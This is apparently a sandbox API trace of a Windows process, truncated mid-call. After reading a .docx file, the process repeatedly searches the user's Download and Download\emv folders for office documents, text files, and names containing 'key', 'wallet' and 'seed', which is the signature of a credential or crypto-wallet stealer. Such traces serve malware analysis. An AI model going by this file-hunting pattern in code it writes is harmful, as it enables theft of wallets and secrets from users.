[0216.934] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\YJrlqSzeXnA.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\yjrlqszexna.docx"), fInfoLevelId=0x0, lpFileInformation=0x36f250 | out: lpFileInformation=0x36f250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59ccd350, ftCreationTime.dwHighDateTime=0x1d7e0bf, ftLastAccessTime.dwLowDateTime=0xb86cb290, ftLastAccessTime.dwHighDateTime=0x1d7e4d4, ftLastWriteTime.dwLowDateTime=0xb86cb290, ftLastWriteTime.dwHighDateTime=0x1d7e4d4, nFileSizeHigh=0x0, nFileSizeLow=0x79d8)) returned 1 [0216.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef88) returned 1 [0216.934] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\YJrlqSzeXnA.docx", nBufferLength=0x105, lpBuffer=0x36ec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\YJrlqSzeXnA.docx", lpFilePart=0x0) returned 0x2d [0216.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a8) returned 1 [0216.935] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\YJrlqSzeXnA.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\yjrlqszexna.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354 [0216.935] GetFileType (hFile=0x354) returned 0x1 [0216.935] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1a4) returned 1 [0216.935] GetFileType (hFile=0x354) returned 0x1 [0216.935] ReadFile (in: hFile=0x354, lpBuffer=0x2587f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2587f50*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.937] ReadFile (in: hFile=0x354, lpBuffer=0x2587f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2587f50*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.937] ReadFile (in: hFile=0x354, lpBuffer=0x2587f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2587f50*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.938] ReadFile (in: hFile=0x354, lpBuffer=0x2587f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2587f50*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.938] ReadFile (in: hFile=0x354, lpBuffer=0x2587f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2587f50*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.938] ReadFile (in: hFile=0x354, lpBuffer=0x2587f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2587f50*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.939] ReadFile (in: hFile=0x354, lpBuffer=0x2587f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2587f50*, lpNumberOfBytesRead=0x36f214*=0x1000, lpOverlapped=0x0) returned 1 [0216.939] ReadFile (in: hFile=0x354, lpBuffer=0x2587f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2587f50*, lpNumberOfBytesRead=0x36f214*=0x9d8, lpOverlapped=0x0) returned 1 [0216.939] ReadFile (in: hFile=0x354, lpBuffer=0x25874bc, nNumberOfBytesToRead=0x228, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x25874bc*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0216.940] ReadFile (in: hFile=0x354, lpBuffer=0x2587f50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36f214, lpOverlapped=0x0 | out: lpBuffer=0x2587f50*, lpNumberOfBytesRead=0x36f214*=0x0, lpOverlapped=0x0) returned 1 [0216.940] CloseHandle (hObject=0x354) returned 1 [0216.941] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0216.941] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%\\\\Download", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\\\Download") returned 0x1d [0216.941] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0216.941] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download", lpFilePart=0x0) returned 0x1b [0216.941] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\*.pdf", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0216.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0216.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0216.944] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download", lpFilePart=0x0) returned 0x1b [0216.945] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\*.docx", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0216.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0216.946] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0216.946] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download", lpFilePart=0x0) returned 0x1b [0216.947] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\*.xls", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0216.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0216.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0216.949] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download", lpFilePart=0x0) returned 0x1b [0216.949] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\*.xlsx", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0216.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0216.951] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0216.951] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download", lpFilePart=0x0) returned 0x1b [0216.951] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\*.txt", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0216.951] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0216.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0216.953] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download", lpFilePart=0x0) returned 0x1b [0216.954] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\*.doc*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0216.954] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0216.955] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0216.955] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download", lpFilePart=0x0) returned 0x1b [0216.956] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\*key*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0216.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0216.958] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0216.958] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download", lpFilePart=0x0) returned 0x1b [0216.958] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\*wallet*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0216.958] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.021] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.021] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download", lpFilePart=0x0) returned 0x1b [0217.021] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\*seed*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.021] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.023] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0217.024] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%\\\\Download\\\\emv", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\\\Download\\\\emv") returned 0x22 [0217.024] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.024] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\emv", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download\\emv", lpFilePart=0x0) returned 0x1f [0217.024] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\emv\\*.pdf", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.026] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\emv", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download\\emv", lpFilePart=0x0) returned 0x1f [0217.026] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\emv\\*.docx", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.028] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\emv", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download\\emv", lpFilePart=0x0) returned 0x1f [0217.028] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\emv\\*.xls", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.030] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.030] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\emv", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download\\emv", lpFilePart=0x0) returned 0x1f [0217.031] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\emv\\*.xlsx", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.032] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.032] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\emv", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download\\emv", lpFilePart=0x0) returned 0x1f [0217.032] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\emv\\*.txt", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.034] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.034] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\emv", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download\\emv", lpFilePart=0x0) returned 0x1f [0217.034] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\emv\\*.doc*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.035] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.036] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.036] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\emv", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download\\emv", lpFilePart=0x0) returned 0x1f [0217.036] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\emv\\*key*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.038] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\emv", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download\\emv", lpFilePart=0x0) returned 0x1f [0217.038] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\emv\\*wallet*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.040] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.040] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\emv", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download\\emv", lpFilePart=0x0) returned 0x1f [0217.040] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\emv\\*seed*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.040] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.042] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0217.042] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%\\\\Download", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\\\Download") returned 0x1d [0217.042] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.042] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download", lpFilePart=0x0) returned 0x1b [0217.042] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\*.pdf", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.044] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.044] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download", lpFilePart=0x0) returned 0x1b [0217.044] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\*.docx", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.044] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.046] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.046] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download", lpFilePart=0x0) returned 0x1b [0217.046] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\*.xls", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.046] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.047] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.047] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download", lpFilePart=0x0) returned 0x1b [0217.048] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\*.xlsx", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.048] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.049] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.049] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download", lpFilePart=0x0) returned 0x1b [0217.049] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\*.txt", lpFindFileData=0x36efc0 | out: 